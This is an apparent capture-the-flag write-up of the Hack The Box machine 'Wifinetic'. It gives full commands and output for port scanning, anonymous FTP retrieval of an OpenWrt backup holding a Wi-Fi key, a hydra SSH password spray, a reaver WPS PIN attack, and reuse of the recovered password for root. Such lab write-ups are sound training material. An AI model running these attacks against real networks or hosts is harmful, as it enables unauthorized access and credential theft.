Description
Wifinetic is an easy Hack The Box machine that features:
- Anonymous FTP server allows retrieving credentials and a backup of a configuration of OpenWRT
- Privilege Escalation via a recovery of a Wi-Fi password by a vulnerability of the Wi-Fi protocol
Footprinting
First, we are going to check with ping command if the machine is active and the system operating system. The target machine IP address is 10.10.11.247.
$ ping -c 3 10.10.11.247
PING 10.10.11.247 (10.10.11.247) 56(84) bytes of data.
64 bytes from 10.10.11.247: icmp_seq=1 ttl=63 time=51.0 ms
64 bytes from 10.10.11.247: icmp_seq=2 ttl=63 time=56.6 ms
64 bytes from 10.10.11.247: icmp_seq=3 ttl=63 time=55.1 ms
--- 10.10.11.247 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 50.966/54.204/56.583/2.372 ms
The machine is active and with the TTL that equals 63 (64 minus 1 jump) we can assure that it is an Unix machine. Now we are going to do a Nmap TCP SYN port scan to check all opened ports.
$ sudo nmap 10.10.11.247 -sS -oN nmap_scan
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.247
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds
We get three open ports, 21, 22 and 53.
Enumeration
Then we do a more advanced scan, with service version and scripts.
$ nmap 10.10.11.247 -sV -sC -p21,22,53 -oN nmap_scan_ports
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.247
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 2023 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 2023 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 2023 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 2023 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 2023 employees_wellness.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.11
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 seconds
We get three services: one File Transfer Protocol (FTP), one Secure Shell (SSH), and a Domain Name System (DNS) services running on a Ubuntu Linux. With the FTP enumerating, we find that the FTP allows anonymous authentication listing some documents and a backup of an OpenWrt router configuration. We download them all.
$ lftp anonymous@10.10.11.247
lftp anonymous@10.10.11.247:~> mget *
In the employees_wellness.pdf file we find a letter from the HR Manager Samantha Wood, with the samantha.wood93@wifinetic.htb email address.
...
Best regards,
Samantha Wood
HR Manager
samantha.wood93@wifinetic.htb
In the ProjectOpenWRT.pdf file we find a letter from the Wireless Network Administrator Oliver Walker, with the olivia.walker17@wifinetic.htb email address.
...
Sincerely,
Oliver Walker
Wireless Network Administrator
olivia.walker17@wifinetic.htb
In the MigrateOpenWrt.txt file there is a mention the the wireless networks auditing tool Reaver.
...
| +-----------------------------------------------+ |
| | Test and Troubleshoot | |
| +-----------------------------------------------+ |
| | | |
| | - Test Wifi connectivity and performance | |
| | - Verify all services are functioning | |
| | - Address and resolve any issues | |
| | - Test for security issues with Reaver tool | |
| | | |
| +-----------------------------------------------+ |
...
We extract the configuration backup file backup-OpenWrt-2023-07-26.tar.
$ tar xvf backup-OpenWrt-2023-07-26.tar
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
...
In the etc/config/rpcd file we find the password of the OpenWRT RPC user root, root.
$ cat etc/config/rpcd
...
config login
option username 'root'
option password '$p$root'
list read '*'
list write '*'
In the etc/config/wireless file we find the password of the Wi-Fi network OpenWRT, VeRyUniUqWiFIPasswrd1!.
$ cat etc/config/wireless
...
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
In the etc/passwd file we find the users of the system, we export them to a list.
$ cat etc/passwd | cut -d: -f1 > users
Exploitation
Now we do a password spray attack to the SSH service.
$ hydra -L users -p 'VeRyUniUqWiFIPasswrd1!' ssh://10.10.11.247
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra)
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://10.10.11.247:22/
[22][ssh] host: 10.10.11.247 login: netadmin password: VeRyUniUqWiFIPasswrd1!
We find a match with the netadmin user, we login.
$ ssh netadmin@10.10.11.247
...
netadmin@wifinetic:~$ id
uid=1000(netadmin) gid=1000(netadmin) groups=1000(netadmin)
Post-Exploitation
We find that there are Wi-Fi interfaces in the system.
netadmin@wifinetic:~$ iw dev
phy#2
Interface mon0
ifindex 7
wdev 0x200000002
addr 02:00:00:00:02:00
type monitor
txpower 20.00 dBm
Interface wlan2
ifindex 5
wdev 0x200000001
addr 02:00:00:00:02:00
type managed
txpower 20.00 dBm
phy#1
Unnamed/non-netdev interface
wdev 0x1000000b9
addr 42:00:00:00:01:00
type P2P-device
txpower 20.00 dBm
Interface wlan1
ifindex 4
wdev 0x100000001
addr 02:00:00:00:01:00
ssid OpenWrt
type managed
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
phy#0
Interface wlan0
ifindex 3
wdev 0x1
addr 02:00:00:00:00:00
ssid OpenWrt
type AP
channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
txpower 20.00 dBm
There are a Wi-Fi interface in mode monitor, prepared for auditing. As we saw previously the mention to the reaver tool, which exploits WPS vulnerabilities. There is a interface used for creating the Wi-Fi access point, with the 02:00:00:00:00:00 MAC address.
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.
We quickly find that the AP is using the default WPS pin, 12345670 and consequently its password is found, WhatIsRealAnDWhAtIsNot51121!. The password is reused for the root user so we can spawn a root shell.
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# id
uid=0(root) gid=0(root) groups=0(root)
Flags
In the root shell we can retrieve the user.txt and root.txt flags.
root@wifinetic:/home/netadmin# cat /home/netadmin/user.txt
<REDACTED>
root@wifinetic:/home/netadmin# cat /root/root.txt
<REDACTED>